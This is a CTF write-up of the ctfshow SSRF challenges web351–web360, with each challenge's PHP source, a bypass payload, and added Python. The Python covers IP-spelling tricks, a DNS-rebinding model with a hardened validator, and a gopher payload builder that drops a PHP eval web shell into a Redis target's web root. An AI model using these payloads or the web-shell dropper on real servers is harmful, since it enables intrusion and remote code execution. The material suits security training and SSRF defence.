ctfshow SSRF series
writeup, SSRF
CTF, SSRF
web351
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
```
The flag is at /flag.php, but the hint says only local users can access it.
Just POST url=http://127.0.0.1/flag.php: the server's own curl makes the request, so it arrives from 127.0.0.1 and passes the "local only" check.
web352
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    // as printed on the page, preg_match() is called without its subject string
    if(!preg_match('/localhost|127.0.0/')){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```
This one filters localhost and 127.0.0 (as printed, the preg_match() call is missing its subject argument, so the regex is never actually applied to $url; the bypass below works even if the filter is read as preg_match('/localhost|127.0.0/', $url)). The point is that IPv4 dotted notation does not have to be four octets separated by three dots: inet_aton() also accepts one, two or three components, and the last component fills all the remaining bits. With two components the first is one byte and the second covers the remaining 24 bits, so 127.65536 parses as 127.1.0.0, and 127.0.0.1 can be written as 127.1.
Payload: url=http://127.1/flag.php
web353
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```
The address components can just as well be written in hexadecimal, because inet_aton() accepts 0x-prefixed components: 127.0.0.1 becomes 0x7f.0x0.0x0.0x1, or, with only the first component in hex, 0x7f.0.0.1. Leading-zero octal components (0177.0.0.1) and the whole address as one 32-bit integer (2130706433 or 0x7f000001) parse the same way. The regex also blocks the ideographic full stop 。 (U+3002), which IDNA-aware URL parsers map to an ASCII dot.
Payload: url=http://0x7f.0.0.1/flag.php
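The short dotted form used in web352 and the hex form used here both fall out of the same inet_aton() parsing rules. As an added example (not code from the original writeup), the Python below reimplements those rules, generates the equivalent spellings of a dotted-quad address, and reports which of them still slip past the blocklist regexes of web352, web353 and web354 when the regex is run over the full URL. The function names and the /flag.php path are this example's own choices.

```python
import re
import struct

# Accepted component spellings: 0x.. hex, leading-0 octal, plain decimal.
_COMPONENT = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def parse_legacy_ipv4(text):
    """Parse an IPv4 literal the way BSD/glibc inet_aton() (and so curl) does:
    one to four dot-separated components, each decimal, 0x-hex or leading-zero
    octal, the last one filling every bit that is left.
    Returns the 4 address bytes, or None if the text is not an address."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if not _COMPONENT.fullmatch(part):
            return None
        if part[:2].lower() == "0x":
            values.append(int(part[2:], 16))
        elif len(part) > 1 and part[0] == "0":
            values.append(int(part, 8))
        else:
            values.append(int(part, 10))
    # Every component but the last is exactly one byte.
    if any(v > 0xFF for v in values[:-1]):
        return None
    # The last component covers the remaining 8, 16, 24 or 32 bits.
    tail_bits = 32 - 8 * (len(values) - 1)
    if values[-1] >= 1 << tail_bits:
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << tail_bits) | values[-1]
    return struct.pack("!I", addr)


def spellings(dotted_quad):
    """Equivalent spellings of an ordinary dotted-quad address."""
    a, b, c, d = (int(x) for x in dotted_quad.split("."))
    as_int = (a << 24) | (b << 16) | (c << 8) | d
    return {
        "two_part": f"{a}.{(b << 16) | (c << 8) | d}",        # 127.1
        "three_part": f"{a}.{b}.{(c << 8) | d}",               # 127.0.1
        "hex": ".".join(f"0x{x:x}" for x in (a, b, c, d)),    # 0x7f.0x0.0x0.0x1
        "mixed_hex": f"0x{a:x}.{b}.{c}.{d}",                   # 0x7f.0.0.1
        "octal": ".".join(f"0{x:o}" for x in (a, b, c, d)),   # 0177.00.00.01
        "decimal": str(as_int),                                # 2130706433
        "hex_int": f"0x{as_int:x}",                            # 0x7f000001
    }


# The blocklist regexes of web352-web354 as they appear in the challenge
# source (web352 keeps its unescaped dots, which match any character).
CHALLENGE_FILTERS = {
    "web352": r"localhost|127.0.0",
    "web353": r"localhost|127\.0\.|。",
    "web354": r"localhost|1|0|。",
}


def slips_past(target, pattern, path="/flag.php"):
    """Spellings of `target` that still parse to the same address but are not
    caught by the case-insensitive blocklist `pattern` run over the whole URL."""
    canonical = parse_legacy_ipv4(target)
    found = {}
    for name, text in spellings(target).items():
        url = f"http://{text}{path}"
        if parse_legacy_ipv4(text) == canonical and not re.search(pattern, url, re.I):
            found[name] = text
    return found


if __name__ == "__main__":
    for level, pattern in CHALLENGE_FILTERS.items():
        print(level, slips_past("127.0.0.1", pattern))
```

Running it shows why web354 needs a different trick: every numeric spelling of 127.0.0.1, in any base, contains a 0 or a 1, so nothing survives its regex. Note that this models inet_aton(); a strict parser such as Python's ipaddress module rejects all of these short forms, which is exactly the kind of mismatch between validator and HTTP client that SSRF filters keep falling over.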
web354
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    if(!preg_match('/localhost|1|0|。/i', $url)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```
The filter is stricter here: the digits 1 and 0 are blocked anywhere in the URL, which rules out every numeric spelling of 127.0.0.1 (each of them contains a 0 or a 1, whatever the base). What the filter cannot see is what a name resolves to, and some public domain names resolve to 127.0.0.1,
for example:
- safe.taobao.com
- 114.taobao.com
- wifi.aliyun.com
- imis.qq.com
- localhost.sec.qq.com
- ecd.tencent.com
- sudo.cc
Payload: url=http://safe.taobao.com/flag.php
These records belong to third parties and can change at any time, so check that the name still resolves to 127.0.0.1 before relying on it, or use a domain you control, as in web357.
web355
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $host=$x['host'];
    if((strlen($host)<=5)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```
The host may be at most 5 characters; 127.1 is exactly 5, so this is straightforward.
Payload: url=http://127.1/flag.php
web356
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $host=$x['host'];
    if((strlen($host)<=3)){
        $ch=curl_init($url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result=curl_exec($ch);
        curl_close($ch);
        echo ($result);
    }
    else{
        die('hacker');
    }
}
else{
    die('hacker');
}
?>
```
The host may be at most 3 characters, so even 127.1 is too long. A single 0 works: inet_aton() parses 0 as 0.0.0.0, and on Linux a connection to 0.0.0.0 is delivered to the local host.
Payload: url=http://0/flag.php
web357
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
    $ip = gethostbyname($x['host']);
    echo '</br>'.$ip.'</br>';
    if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        die('ip!');
    }
    echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>
```
Private and reserved IPs are filtered, but the check runs on the result of gethostbyname() while file_get_contents() resolves the hostname again on its own, so there are two lookups and nothing ties them together. That is DNS rebinding: register a domain at http://ceye.io, where a record can be bound to several IPs, and have it answer with a public address and 127.0.0.1. When the first lookup gets the public address and the second gets 127.0.0.1 the check passes and the fetch goes to localhost; since which answer you get is up to the resolver, resend the request until the two lookups differ.
Payload: url=http://r.nnagih.ceye.io/flag.php (the author's own ceye.io domain)
web358
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}
```
This one has nothing to do with parse_url() at all: $x is computed and then never used. The regex runs on the raw URL and only requires it to start with http://ctf. and end with show. So put ctf. in the userinfo part before the @ and show in the query string; file_get_contents() connects to the host after the @, which is 127.0.0.1.
Payload: url=http://ctf.@127.0.0.1/flag.php?show
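web357 and web358 are both cases where the check and the fetch look at different things: in web357 the name is resolved once for filter_var() and again by file_get_contents(), and in web358 the regex sees ctf. while the HTTP client sees the host after the @. As an added illustration (not the challenge's code or the author's), the Python below models the web357 check next to a hardened version that parses strictly, rejects userinfo, resolves once, validates every answer and pins the validated address. The resolver is injected so the rebinding race can be reproduced offline; the name r.example.test and the public address 93.184.216.34 are constructed sample data.

```python
import ipaddress
from urllib.parse import urlsplit

# IPv4 ranges that PHP's filter_var(FILTER_VALIDATE_IP,
# FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) rejects.
PHP_BLOCKED = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",              # private
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "240.0.0.0/4",  # reserved
)]


def php_like_ip_ok(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in PHP_BLOCKED)


def naive_plan(url, resolve):
    """web357 logic: validate the first answer of one lookup, then hand the
    *name* to the HTTP client, which looks it up again. Returns the address
    the client would actually connect to. `resolve(host)` returns a list of
    address strings, like getaddrinfo()."""
    host = urlsplit(url).hostname
    if not php_like_ip_ok(resolve(host)[0]):    # lookup 1: the check
        raise ValueError("ip!")
    return resolve(host)[0]                     # lookup 2: the fetch


def pinned_plan(url, resolve):
    """Hardened version: strict parse, no userinfo, one lookup, every answer
    validated, and the validated address is what the client must connect to
    (sending the original name in the Host header)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo")            # stops http://ctf.@127.0.0.1/
    if not parts.hostname:
        raise ValueError("host")
    answers = [ipaddress.ip_address(a) for a in resolve(parts.hostname)]
    if not answers or not all(ip.is_global for ip in answers):
        raise ValueError("ip!")                 # is_global is stricter than the PHP flags
    return str(answers[0])


def rebinding_resolver(answers):
    """Constructed stand-in for DNS: each call returns the next answer list,
    which is what a low-TTL record flipping between two IPs looks like."""
    queue = list(answers)

    def resolve(host):
        return queue.pop(0)

    return resolve


def rejects(plan, url, resolve):
    """True if `plan` refuses the URL under the given resolver."""
    try:
        plan(url, resolve)
    except ValueError:
        return True
    return False


def demo():
    """Attacker's record answers with a public IP first, then 127.0.0.1."""
    answers = [["93.184.216.34"], ["127.0.0.1"]]     # constructed sample
    naive = naive_plan("http://r.example.test/flag.php", rebinding_resolver(answers))
    pinned = pinned_plan("http://r.example.test/flag.php", rebinding_resolver(answers))
    return naive, pinned


if __name__ == "__main__":
    print(demo())   # naive connects to 127.0.0.1, pinned to 93.184.216.34
```

Pinning only helps if the HTTP client really connects to the returned address rather than the name (curl's CURLOPT_RESOLVE / --resolve does this) and if redirects are either disabled or re-validated with the same function, otherwise a 302 to http://127.0.0.1/ reopens the hole.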
web359
Gopher protocol against MySQL.
The returl parameter is the SSRF entry point.
Generate the payload and send it through returl. This only works when the target MySQL account logs in without a password: the whole login exchange has to be replayed blindly through gopher, with no way to answer a server challenge.
Connect to the resulting shell with AntSword and read the flag.
web360
Gopher against Redis.
Same steps as above.
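The writeup does not show how the gopher payload is built, so here is an added example (not the author's tool or code) for the Redis case: it encodes Redis commands in RESP, wraps them in a gopher:// URL the way curl and file_get_contents() expect, and shows the second percent-encoding needed when the URL travels inside a POST parameter. The command sequence is the usual CONFIG SET dir / dbfilename, SET, SAVE trick for dropping a file through an RDB dump; the web root, file name and PHP body are assumptions about a target, not taken from the page.

```python
from urllib.parse import quote, unquote, urlsplit


def resp_encode(command):
    """Encode one Redis command (a list of arguments) as a RESP array,
    the format redis-server reads from clients."""
    encoded = f"*{len(command)}\r\n"
    for arg in command:
        encoded += f"${len(arg.encode())}\r\n{arg}\r\n"
    return encoded


def gopher_url(host, port, commands):
    """Build a gopher:// URL that makes the target's curl/file_get_contents()
    open host:port and write the RESP bytes. The '_' right after the path's
    slash is the gopher item type and is stripped by the client; everything
    after it is percent-decoded and sent as-is."""
    payload = "".join(resp_encode(cmd) for cmd in commands)
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def wire_bytes(url):
    """What the SSRF client will actually write to the socket for `url`,
    useful for checking a payload before sending it."""
    path = urlsplit(url).path
    return unquote(path[2:]).encode()     # drop "/" and the item type


def post_body(url):
    """The gopher URL must be percent-encoded a second time when it is sent
    as an application/x-www-form-urlencoded POST parameter, otherwise the
    web server decodes the %0D%0A and the RESP framing is destroyed."""
    return "url=" + quote(url, safe="")


def redis_webshell(web_root, filename, php):
    """RDB-dump trick: point the dump at the web root, store the PHP as a
    value, then SAVE. web_root/filename/php are assumptions about the target."""
    return [
        ["CONFIG", "SET", "dir", web_root],
        ["CONFIG", "SET", "dbfilename", filename],
        ["SET", "x", php],
        ["SAVE"],
    ]


if __name__ == "__main__":
    cmds = redis_webshell("/var/www/html", "shell.php", "<?php eval($_POST['cmd']); ?>")
    url = gopher_url("127.0.0.1", 6379, cmds)
    print(url)
    print(wire_bytes(url))
    print(post_body(url))
```

This only lands when Redis has no password, CONFIG has not been renamed or disabled, and the redis user can write into the web root; the dumped file also contains RDB binary around the PHP, which the PHP interpreter ignores.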